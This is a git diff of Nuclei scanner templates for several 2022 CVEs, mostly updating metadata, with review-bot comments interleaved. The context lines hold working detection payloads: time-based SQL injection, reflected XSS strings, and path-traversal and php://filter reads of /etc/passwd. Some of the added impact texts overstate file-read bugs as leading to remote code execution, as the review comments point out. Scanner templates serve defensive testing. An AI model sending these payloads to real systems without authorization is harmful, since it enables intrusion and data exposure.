@@ -49,5 +56,4 @@ requests: - 'status_code_2 == 200' - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')" condition: and - -# Enhanced by mp on 2022/10/06 \ No newline at end of file +# digest: 490a004630440220174e125afd24ffd46b83dc8fbd16ba76bac1f9c389dcf41df028a42b438df438022062eb429750f3554a28c017e74167a82a4023aa672bf4059f0bc3e2e444886d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-37153.yaml b/nuclei-templates/CVE-2022/CVE-2022-37153.yaml index 5ef1b9aa8c..b22c9cf9a6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37153.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37153.yaml @@ -6,20 +6,31 @@ info: severity: medium description: | Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php. + remediation: | + Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability. reference: - https://github.com/Fjowel/CVE-2022-37153 - https://nvd.nist.gov/vuln/detail/CVE-2022-37153 + - https://github.com/SYRTI/POC_to_review + - https://github.com/WhooAmii/POC_to_review + - https://github.com/k0mi-tg/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-37153 cwe-id: CWE-79 + epss-score: 0.0013 + epss-percentile: 0.47096 + cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: articatech + product: artica_proxy shodan-query: http.html:"Artica" - verified: "true" - tags: cve,cve2022,xss,artica + tags: cve,cve2022,xss,artica,articatech -requests: +http: - raw: - | POST /fw.login.php HTTP/1.1 
@@ -45,5 +56,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4b0a00483046022100df0431683f7ff338969210c72a2895dd79303bff523433299b1dc2074c65ffe102210086ecf0af9d7d5b544b35d85c2af4279bb4f62ed131ac6bf93e84e32089f02d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-37190.yaml b/nuclei-templates/CVE-2022/CVE-2022-37190.yaml index 5e58503c65..2676a9c412 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37190.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37190.yaml @@ -6,25 +6,28 @@ info: severity: high description: | CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-37190 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-37190 cwe-id: CWE-732 epss-score: 0.02018 - epss-percentile: 0.87631 + epss-percentile: 0.8771 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,rce,cuppa,authenticated + tags: cve2022,cve,rce,cuppa,authenticated,cuppacms http: - raw: 
@@ -71,4 +74,4 @@ http: regex: - "(.*?)" internal: true -# digest: 490a00463044022052364943e2085295765fa8dda2e0085f7085dee0f9b705bdfb2eb6700e655e6e0220022ad2b5768861333782b08cc9a9d067f0d7e75c24ac9b8b631ed97ce6ca5042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053679076bc7557501e02d91d43aef620a97ae250150ec9582e38ba855f404c6c022100c8428d2b76fa3b6dc76a6218b76fe10761ac009d56feb84be0cddc2a9f54cfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-37191.yaml b/nuclei-templates/CVE-2022/CVE-2022-37191.yaml index 63b8d1cff9..6cd220e036 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37191.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37191.yaml @@ -6,25 +6,28 @@ info: severity: medium description: | The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-37191 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-37191 cwe-id: CWE-829 - epss-score: 0.36609 - epss-percentile: 0.96785 + epss-score: 0.46328 + epss-percentile: 0.97122 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,authenticated + tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms http: - raw: 
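Review bot: The added `impact:` text claims the LFI "can lead to ... remote code execution", but the description in the same hunk is an authenticated file read and the unchanged `cvss-metrics` vector is `C:H/I:N/A:N` (confidentiality only), so the impact overstates what the template demonstrates; `Successful exploitation allows an authenticated user to read arbitrary files on the server, exposing configuration and credential material.` would match the vector. The same RCE claim is added to CVE-2022-37299 (also `C:H/I:N/A:N` in its hunk) and to CVE-2022-38794 (an `/etc/passwd` read), where the vector line is outside the hunk.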
@@ -71,4 +74,4 @@ http:
 regex:
 - "(.*?)"
 internal: true
-# digest: 4a0a0047304502207967dff4b0af816ef8463829913b8096f975b6a3bc0a90b13622439c370285c8022100f55f9487a8ce9913c77bf85f0a3be2710dfdc84471ac0e18e35100505e258d90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100904cc1a592552a2c9efd1a803e2a5a5680978eedc314a4ec299062cd14edb5a4022100fd7b972b8ba3218b82bbd8a155497cf3d8d1b67134bdc2b3579f6f06970e0aea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-37299.yaml b/nuclei-templates/CVE-2022/CVE-2022-37299.yaml
index d643281547..09f3c6f08e 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-37299.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-37299.yaml
@@ -5,20 +5,32 @@ info: author: pikpikcu severity: medium description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. + remediation: | + Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability. reference: - https://twitter.com/pikpikcu/status/1568316864690028544 - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue - https://nvd.nist.gov/vuln/detail/CVE-2022-37299 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-37299 cwe-id: CWE-22 + epss-score: 0.00772 + epss-percentile: 0.80878 + cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,shirnecms,lfi + verified: true + max-request: 1 + vendor: shirne_cms_project + product: shirne_cms + tags: cve,cve2022,shirnecms,lfi,shirne_cms_project -requests: +http: - method: GET path: - "{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test" @@ -38,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a0048304602210094bc65c10f89d2bb9c87686eba12f012554fc0ce21425c4d59230a1d8de5f4a9022100cf813f36fe3c9da4e06e3a7ee76fc66362ee7b3a792eba20f1c7d6f5abc0c98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3768.yaml b/nuclei-templates/CVE-2022/CVE-2022-3768.yaml index ab9468c668..38ea791bf2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3768.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3768.yaml 
@@ -6,21 +6,32 @@ info: severity: high description: | WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 - https://cve.report/CVE-2022-3768 - remediation: Fixed in version 1.3.12. + - https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-3768 cwe-id: CWE-89 + epss-score: 0.01715 + epss-percentile: 0.86512 + cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-smart-contracts,authenticated,cve,wordpress,wp,sqli,cve2022,wp-plugin,wpscan + verified: true + max-request: 2 + vendor: wpsmartcontracts + product: wpsmartcontracts + framework: wordpress + tags: cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -32,17 +43,16 @@ requests: log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | - GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1 + @timeout: 15s + GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers: - type: dsl dsl: - - 'duration_2>=5' + - 'duration_2>=7' - 'status_code_2 == 200' - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Batch Mint NFTs")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4b0a00483046022100bd925a5d0628000976660fe729e42a7f314f002bfb6407b82e26f1b090b62a4d022100b482d42c6c8674fb3ced86981e2df21831b145496f590b50dec1531c3d60d471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3800.yaml b/nuclei-templates/CVE-2022/CVE-2022-3800.yaml index 293a8c8d81..0e1e14bfce 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3800.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3800.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks. reference: 
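Review bot: `cookie-reuse: true` is dropped from this hunk although the second raw request still depends on the session cookie set by the `POST /wp-login.php` in request 1; this is only safe on engine versions where cookie reuse is the default for multi-request `http` templates, and on older engines the authenticated request would silently stop matching. The same removal is made in CVE-2022-38637. If the repository has moved to such a version, a one-line comment like `# cookie reuse is the engine default; the login session carries into request 2` next to the raw list would record why the key is gone.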
@@ -18,13 +20,13 @@ info: cve-id: CVE-2022-3800 cwe-id: CWE-89,CWE-707 epss-score: 0.05291 - epss-percentile: 0.9224 + epss-percentile: 0.92303 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibax product: go-ibax - tags: cve,cve2022,ibax,go-ibax,sqli + tags: cve2022,cve,ibax,go-ibax,sqli http: - raw: @@ -44,4 +46,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "usesysid")' condition: and -# digest: 4a0a00473045022100934ba5d04aa07cd474eb481b0bca831262123af234281cf39432593b3ddab504022078b1fe69094beb2fdaa8f0ef2095d30cc8eb8bb0a86ffa430d9efacdc838d83a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f15cc161ca0936b83e8f97725a8c7682727e50af295464970a0119f45333c8902202333cca77720c53959b684542fef75975bccfe288152444357d2657e50a796ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38295.yaml b/nuclei-templates/CVE-2022/CVE-2022-38295.yaml index d2c139164b..95f0612c1b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38295.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38295.yaml 
@@ -6,25 +6,28 @@ info: severity: medium description: | Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-38295 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38295 cwe-id: CWE-79 - epss-score: 0.00304 - epss-percentile: 0.66373 + epss-score: 0.00269 + epss-percentile: 0.64416 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,xss,cuppa,authenticated + tags: cve2022,cve,xss,cuppa,authenticated,cuppacms http: - raw: @@ -64,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f5040ad3f2d2453967d88e55a8121ac7e1c74da698eced01fa0d9a03253c17b02203c502d66470e5e75fac9319b4687409b96e8fcbdc2f0513d64d20c3f86df9470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205702724d42507ffc7d8cd044e6d6cf80b1f1c0a3064667003638e86af6920a29022100c1aa20860b9fe2846eca8e70f515a44501a69d01c6e6e2f1e78c634a549800ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38296.yaml b/nuclei-templates/CVE-2022/CVE-2022-38296.yaml index 7c96276beb..8a18e4b952 100644 
--- a/nuclei-templates/CVE-2022/CVE-2022-38296.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38296.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system. remediation: | Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability. reference: @@ -16,15 +18,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 - epss-score: 0.02096 - epss-percentile: 0.87892 + epss-score: 0.02351 + epss-percentile: 0.88674 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,rce,cuppa,intrusive + tags: cve,cve2022,rce,cuppa,intrusive,cuppacms http: - raw: @@ -101,5 +103,4 @@ http: regex: - '"name":"(.*?)",' internal: true - -# digest: 490a0046304402206c48e4e04449fb8d85169d5ce90e19645e08b2b71062e52151d12bdc14ac854002205ad324b660bc8fc8e70208fa68e15aa2e63f62b787260d9a24144ed1dcc6c882:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008e6f64cbcac30a77559654a774f32ae62113b17ec9d03eef4da8a86d796f2d2d0220687c6d62f1c3abc958148a0289f7076ec9819d04b320980f98c45a7caa8288a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38463.yaml b/nuclei-templates/CVE-2022/CVE-2022-38463.yaml index db0bb75a2f..910d6cdbc6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38463.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38463.yaml 
@@ -6,19 +6,33 @@ info: severity: medium description: | ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance. + remediation: | + Apply the latest security patches provided by ServiceNow to mitigate this vulnerability. reference: - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793 - https://nvd.nist.gov/vuln/detail/CVE-2022-38463 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38463 cwe-id: CWE-79 + epss-score: 0.00174 + epss-percentile: 0.53646 + cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow shodan-query: http.title:"ServiceNow" - verified: "true" tags: cve,cve2022,servicenow,xss -requests: + +http: - method: GET path: - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)" @@ -38,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a004730450220602dde2b93eb0d41d3c031c0120a9007197dfb886c56eb72c39a68e752d55dde022100f6fd085c092dc14047ca0974a626fcb410641ff5f391c3d454c2707f5efd823a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38467.yaml b/nuclei-templates/CVE-2022/CVE-2022-38467.yaml index b607bd6f6c..fa85aa016a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38467.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-38467.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.1.1 reference: - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53 - https://wordpress.org/plugins/crm-perks-forms/ - https://nvd.nist.gov/vuln/detail/CVE-2022-38467 - https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38467 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00092 + epss-percentile: 0.37951 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: crmperks product: crm_perks_forms framework: wordpress - tags: crm-perks-forms,wpscan,cve,cve2022,wordpress,wp,wp-plugin,xss + tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks http: - raw: 
@@ -44,4 +47,4 @@ http:
 - 'contains(content_type_2, "text/html")'
 - 'contains(body_1, "CRM Perks Forms") && contains(body_2, "")'
 condition: and
-# digest: 4b0a00483046022100f2e96fa8e2f33594ebe69730808cd1319a4e112bde5900e0c038365c8d97a2c0022100da6791e48390b50f50e0644023b66807addb14aa8739e079b3a78f0cbc2c578b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220729431423049e0675d567b6cbd1d77e01b4e70f542ae8a569d9765cf8dcd344b02205d87faab9dfcd79998b0d0e68c7e91eb95180dd93bf447409ae8c7579e50761b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-38553.yaml b/nuclei-templates/CVE-2022/CVE-2022-38553.yaml
index eb2d6a07b6..faef6326e0 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-38553.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-38553.yaml
@@ -6,22 +6,33 @@ info: severity: medium description: | Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability. reference: - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity - https://github.com/4websecurity/CVE-2022-38553 - https://codecanyon.net/item/academy-course-based-learning-management-system/22703468 - https://nvd.nist.gov/vuln/detail/CVE-2022-38553 + - http://academy.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 + epss-score: 0.00218 + epss-percentile: 0.5972 + cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: creativeitem + product: academy_learning_management_system google-query: intext:"Study any topic, anytime" - verified: "true" - tags: cve,cve2022,academylms,xss + tags: cve2022,cve,academylms,xss,creativeitem -requests: +http: - method: GET path: - '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' @@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/18 +# digest: 490a004630440220198f27be524ccad8572426583afc7404f4eadb4ee97c8673dfcc45c69474e4cc02205db8821d527e95ccb104e194cba4ad01b37bd10b23d007f2b2b49dd6dbc40b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
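Review bot: The added reference `- http://academy.com` does not appear to point at the affected product — the other references and the new `cpe` name Creativeitem's Academy LMS, distributed through codecanyon — so it looks like an auto-generated vendor guess; drop it, or replace it with the vendor's own product page if one is known. The reference list is where a reader goes to verify the finding, so an unrelated domain costs more than it adds.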
diff --git a/nuclei-templates/CVE-2022/CVE-2022-38637.yaml b/nuclei-templates/CVE-2022/CVE-2022-38637.yaml index b97430b29e..e66c68ee6d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38637.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38637.yaml @@ -6,21 +6,33 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.youtube.com/watch?v=m8nW0p69UHU - https://owasp.org/www-community/attacks/SQL_Injection - https://nvd.nist.gov/vuln/detail/CVE-2022-38637 + - https://github.com/Henry4E36/POCS + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-38637 cwe-id: CWE-89 + epss-score: 0.01231 + epss-percentile: 0.85126 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: hospital_management_system_project + product: hospital_management_system shodan-query: http.html:"Hospital Management System" - verified: "true" - tags: cve,cve2022,hms,cms,sqli,auth-bypass + tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project -requests: +http: - raw: - | POST /hms/user-login.php HTTP/1.1 @@ -31,7 +43,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word 
@@ -44,5 +56,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/28 +# digest: 4a0a00473045022100a8383f340fa0dfe055b740805fc9006b8240efd45919da33d427bf756f32ea3002202ce22932462286045aba1b3fcbf86f9f3abb7035232fbf32730b0d01b48c2f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38794.yaml b/nuclei-templates/CVE-2022/CVE-2022-38794.yaml index 9b84d5d12c..2975a09d86 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38794.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38794.yaml @@ -6,6 +6,10 @@ info: severity: high description: | Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. + remediation: | + To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations. reference: - https://github.com/zyearn/zaver/issues/22 - https://nvd.nist.gov/vuln/detail/CVE-2022-38794 @@ -14,9 +18,16 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 - tags: cve,cve2022,lfi,zaver + epss-score: 0.00536 + epss-percentile: 0.7469 + cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zaver_project + product: zaver + tags: cve,cve2022,lfi,zaver,zaver_project -requests: +http: - method: GET path: - '{{BaseURL}}/../../../../../../../../etc/passwd' @@ -31,5 +42,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402200ed779a9f9687940b2962eb1cb81f498633c303dafce9c65a87715c7441bba2302202d18e5e190defccdc3cd1e37a554cbd556bac428d069591d6ebf5e90df3e8ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38817.yaml b/nuclei-templates/CVE-2022/CVE-2022-38817.yaml index bddabf805e..8ab0162bf2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38817.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-38817.yaml @@ -6,6 +6,10 @@ info: severity: high description: | Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability allows unauthorized access to the Dapr Dashboard, potentially leading to unauthorized actions and data exposure. + remediation: | + Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor. reference: - https://github.com/dapr/dashboard/issues/222 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817 @@ -15,11 +19,18 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38817 + cwe-id: CWE-306 + epss-score: 0.01019 + epss-percentile: 0.82099 + cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: + max-request: 3 + vendor: linuxfoundation + product: dapr_dashboard shodan-query: http.title:"Dapr Dashboard" - tags: cve,cve2022,dapr,dashboard,unauth + tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation -requests: +http: - method: GET path: - "{{BaseURL}}/components/statestore" @@ -27,6 +38,7 @@ requests: - "{{BaseURL}}/controlplane" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a00473045022100ed31baef3a743912069b65ba5acc47646dcaf490915517bdd8e0e7ad7000e63002201f52667a811d396e971bdb076b9e20faf5f2855da5529fd33c7f57c62aca15cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38870.yaml b/nuclei-templates/CVE-2022/CVE-2022-38870.yaml index 924cfb8f0b..c3317573fc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38870.yaml 